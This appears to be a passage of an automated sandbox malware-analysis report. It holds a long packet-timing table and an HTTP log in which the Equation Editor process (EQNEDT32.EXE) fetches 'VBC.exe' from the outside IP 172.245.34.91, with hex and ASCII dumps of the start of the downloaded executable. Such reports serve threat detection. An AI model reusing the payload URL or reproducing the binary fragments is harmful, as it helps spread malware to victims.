Nov 29, 2022 08:13:06.223803997 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223819017 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223823071 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223829985 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223843098 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223860979 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223879099 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223884106 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223897934 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223907948 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223916054 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223926067 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223936081 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223951101 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223956108 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223964930 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223977089 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223992109 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223995924 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224004984 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224014997 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224026918 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224034071 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224039078 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224054098 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224070072 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224071980 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224081039 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224092960 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224102020 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224112034 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224119902 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224132061 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224144936 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224152088 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224169016 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224173069 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224189043 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224195004 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224203110 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224215031 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224226952 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224234104 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224247932 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224253893 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224258900 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224275112 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.224287033 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224298954 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.224320889 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.225447893 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336641073 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336679935 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336699009 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336718082 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336725950 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336738110 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336756945 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336776972 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336786032 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336786032 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336786032 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336797953 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336807013 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336817980 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336823940 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336838007 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336846113 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336858988 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336869001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336879015 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336889029 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336899042 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336904049 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336914062 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336926937 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336945057 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336957932 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336971045 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336976051 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.336988926 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.336996078 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.337008953 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.337013960 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.337028980 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.337033033 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.337047100 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.337049961 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.337066889 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.337086916 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.337095976 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.337095976 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.337109089 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.337126970 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.338113070 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.339504957 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.339534998 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.339551926 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.339570999 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.339590073 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.339608908 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.339617014 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.339627981 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.339643002 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.339660883 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.339678049 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.339818001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345240116 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345278978 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345298052 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345316887 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345315933 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345335960 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345351934 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345351934 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345356941 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345366001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345377922 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345391989 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345397949 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345417976 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345437050 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345453978 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345472097 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345489979 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345508099 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345525980 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345539093 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345539093 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345539093 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345539093 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345540047 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345540047 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345544100 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345540047 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345540047 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345566034 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345571995 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345571995 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345585108 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345598936 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345604897 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345611095 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345623970 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345629930 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345643044 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345645905 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345662117 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345669031 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345681906 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345686913 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345701933 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345706940 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345721006 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345724106 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345738888 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345741987 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345757008 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345761061 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345776081 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345777988 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345796108 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345798016 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345813036 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345828056 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345844984 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345864058 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345880032 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345882893 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345899105 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345910072 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345916986 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345927000 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345936060 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345943928 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345954895 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345966101 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345973015 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.345983028 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.345993042 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346000910 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346013069 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346020937 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346030951 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346045971 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346050024 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346065998 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346080065 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346093893 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346128941 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346146107 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346147060 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346167088 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346167088 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346184969 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346194029 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346204042 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346213102 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346224070 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346232891 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346244097 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346249104 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346263885 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346267939 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346282959 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346290112 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346304893 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346318007 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346323013 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346328974 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346342087 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346349001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346360922 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346369982 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346379995 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346389055 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346400023 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346405983 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346419096 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.346426010 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346441031 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.346457958 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.347217083 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.347239017 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.347251892 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.347265005 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.347278118 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.347291946 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.347305059 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.347316980 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.347445965 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.347642899 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:08.286144972 CET	49173	80	192.168.2.22	172.245.34.91

HTTP Request Dependency Graph

172.245.34.91

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49173	172.245.34.91	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 29, 2022 08:13:05.476435900 CET	0	OUT	GET /5643/VBC.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 172.245.34.91 Connection: Keep-Alive
Nov 29, 2022 08:13:05.603394032 CET	1	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 07:13:05 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.33 Last-Modified: Tue, 29 Nov 2022 05:24:03 GMT ETag: "74a68-5ee95323a363c" Accept-Ranges: bytes Content-Length: 477800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 e8 81 e9 50 86 d2 e9 50 86 d2 e9 50 86 d2 2a 5f d9 d2 eb 50 86 d2 e9 50 87 d2 4f 50 86 d2 2a 5f db d2 e6 50 86 d2 bd 73 b6 d2 e3 50 86 d2 2e 56 80 d2 e8 50 86 d2 52 69 63 68 e9 50 86 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 38 ca 4d 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 62 00 00 00 2a 02 00 00 08 00 00 4a 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 70 09 00 00 04 00 00 17 86 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 e0 06 00 68 88 02 00 00 00 00 00 00 00 00 00 10 35 07 00 58 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f1 61 00 00 00 10 00 00 00 62 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 13 00 00 00 80 00 00 00 14 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 03 02 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 30 04 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 88 02 00 00 e0 06 00 00 8a 02 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PPP_PPOP_PsP.VPRichPPEL8MXb*J4@p@h5X.textab `.rdataf@@.data8z@.ndata0.rsrch@@
Nov 29, 2022 08:13:05.603449106 CET	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d Data Ascii: U\}t+}FEuHHBHPuuu$@BSV5PBEWPu(@eEEPu,@}e\@FRVVU+MM3FQNUMVT
Nov 29, 2022 08:13:05.603480101 CET	4	IN	Data Raw: c3 fe ff ff e9 1b 16 00 00 53 50 e8 9f 3e 00 00 e9 04 16 00 00 53 e8 54 17 00 00 83 f8 01 59 89 55 b0 7f 03 33 c0 40 50 ff 15 7c 80 40 00 e9 e6 15 00 00 ff 75 f8 ff 15 98 82 40 00 e9 d8 15 00 00 c1 e0 02 39 5d e0 75 26 8b 88 c0 a2 42 00 6a 01 89 Data Ascii: SP>STYU3@P\|@u@9]u&BjBYUMBBBE4B3;#MDE4BVB5h@;tuQE$B;APQ8juP@
Nov 29, 2022 08:13:05.603504896 CET	5	IN	Data Raw: 8b 45 c8 8d 04 78 50 56 e8 3d 48 00 00 39 5d 08 7d 0e 56 e8 48 48 00 00 01 45 08 79 03 89 5d 08 8b 45 08 3d 00 04 00 00 0f 8d e5 10 00 00 66 89 1c 46 e9 dc 10 00 00 6a 20 e8 4d 12 00 00 6a 31 8b f0 e8 44 12 00 00 39 5d e8 50 56 75 12 ff 15 18 81 Data Ascii: ExPV=H9]}VHHEy]E=fFj Mj1D9]PVu@uzE(@3GWhVPE$@t9]tVu(@u}ffiSjU9]YYUu;\|~;sEDxE6jzj
Nov 29, 2022 08:13:05.603530884 CET	7	IN	Data Raw: 00 00 e9 cc 09 00 00 53 e8 78 0d 00 00 8b f0 56 6a eb e8 8c 34 00 00 56 e8 07 3a 00 00 3b c3 89 45 08 0f 84 ab 09 00 00 39 5d e0 74 4f 8b 35 b8 80 40 00 6a 64 50 ff d6 bf 02 01 00 00 eb 0e 6a 0f e8 14 47 00 00 6a 64 ff 75 08 ff d6 3b c7 74 ee 8d Data Ascii: SxVj4V:;E9]tO5@jdPjGjdu;tEPu8@9]\|uuB9]tEu @jPE;twuAwEffjMEQPjJFEf;fEWj@
Nov 29, 2022 08:13:05.603557110 CET	8	IN	Data Raw: 00 50 e8 b8 08 00 00 8b f8 3b fb 0f 84 f6 06 00 00 e9 b7 04 00 00 50 e8 58 09 00 00 8b 75 e8 8b f8 8b 45 ec 6a 02 89 45 b0 e8 51 08 00 00 6a 11 89 45 c8 e8 47 08 00 00 8d 4d 08 53 51 8b 0d f0 a2 42 00 83 c9 02 53 51 53 53 53 50 57 c7 45 fc 01 00 Data Ascii: P;PXuEjEQjEGMSQBSQSSSPWE$@@uj#W=DujY@VUXuhWSuPWuSuu(@u]uhj3;fMEQ
Nov 29, 2022 08:13:05.603585005 CET	9	IN	Data Raw: 00 00 85 c0 75 07 6a ed e8 6c 03 00 00 56 e8 d5 34 00 00 6a 02 68 00 00 00 40 56 e8 ed 34 00 00 83 f8 ff 89 45 08 0f 84 97 00 00 00 a1 54 a2 42 00 8b 35 0c 81 40 00 50 6a 40 89 45 c8 ff d6 8b f8 3b fb 74 75 53 e8 dd 0a 00 00 ff 75 c8 57 e8 be 0a Data Ascii: ujlV4jh@V4ETB5@Pj@E;tuSuWuj@;ut4uVSu0FQVPM@4u8uu@uWu5W@SSujEu @9]j^}j^uD@EVSmY;=lB
